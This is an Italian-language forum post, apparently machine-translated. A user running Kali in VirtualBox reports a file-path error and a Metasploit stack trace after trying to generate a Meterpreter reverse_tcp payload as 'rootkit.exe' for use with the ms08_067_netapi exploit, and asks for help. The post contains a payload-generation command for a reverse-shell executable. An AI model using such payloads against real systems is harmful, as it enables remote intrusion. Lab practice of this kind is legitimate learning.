Usando windows / smb / ms08_067_netapi exploit e windows / meterpreter / reverse_tcp come payload questo è quello che ottengo:
msf payload(reverse_tcp) > generate -f ~/Desktop/rootkit.exe -p windows -t exe
[*] Writing 73802 bytes to ~/Desktop/rootkit.exe...
[-] Error while running command generate: No such file or directory @ rb_sysopen - ~/Desktop/rootkit.exe
Stack di chiamate:
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/payload.rb:148:in 'initialize'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/payload.rb:148:in 'open'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/payload.rb:148:in 'cmd_generate'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in 'run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in 'block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in 'each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in 'run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:205:in 'run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in 'start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in 'start'
/usr/bin/msfconsole:48:in '<main>'
Non sei sicuro di quale sia il problema. Sto gestendo Kali in una scatola virtuale. Qualcuno ha qualche idea?